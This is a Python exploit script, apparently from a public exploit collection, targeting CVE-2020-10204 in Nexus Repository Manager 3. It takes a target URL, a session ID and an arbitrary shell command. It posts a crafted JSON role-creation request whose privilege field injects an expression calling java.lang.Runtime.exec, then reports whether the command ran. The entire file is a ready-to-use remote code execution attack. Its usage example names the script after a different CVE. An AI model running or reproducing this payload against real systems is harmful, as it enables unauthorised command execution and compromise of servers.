#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author:zhzyker
# from:https://github.com/zhzyker/exphub

import sys
import requests

if len(sys.argv)!=4:
    print('+---------------------------------------------------------------------------------------------------------+')
    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub                                                    +')
    print('+      CVE-2020-10204 Nexus Repository Manager 3 Remote Code Execution                                    +')
    print('+---------------------------------------------------------------------------------------------------------+')
    print('+ USE: python3 <filename> <url> <session> <cmd>                                                           +')
    print('+ EXP: python3 cve-2020-11444_exp.py http://ip:8081 6c012a5e-88d9-4f96-a05f-3790294dc49a "touch /tmp/233" +')
    print('+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1                                                   +')
    print('+---------------------------------------------------------------------------------------------------------+')
    sys.exit(0)

url = sys.argv[1]
vuln_url = url + "/service/extdirect"
session = sys.argv[2]
cmd = sys.argv[3]

headers = {
    'accept': "application/json",
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
    'NX-ANTI-CSRF-TOKEN': "0.856555763510765",
    'Content-Type': "application/json",
    'Cookie': "jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.856555763510765; NXSESSIONID="+session+""
}
data = """
{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('%s')}"],"roles":[]}],"type":"rpc","tid":89}
""" % cmd

r = requests.post(url=vuln_url, headers=headers, data=data, timeout=20)
if r.status_code == 200:
    if "UNIXProcess" in r.text:
        print ("[+] Command Executed Successfully (Not Echo)")
    else:
        print ("[-] Command Execution Failed")
else:
    print ("[-] Target Not CVE-2020-10204 Vuln Good Luck")
    
    
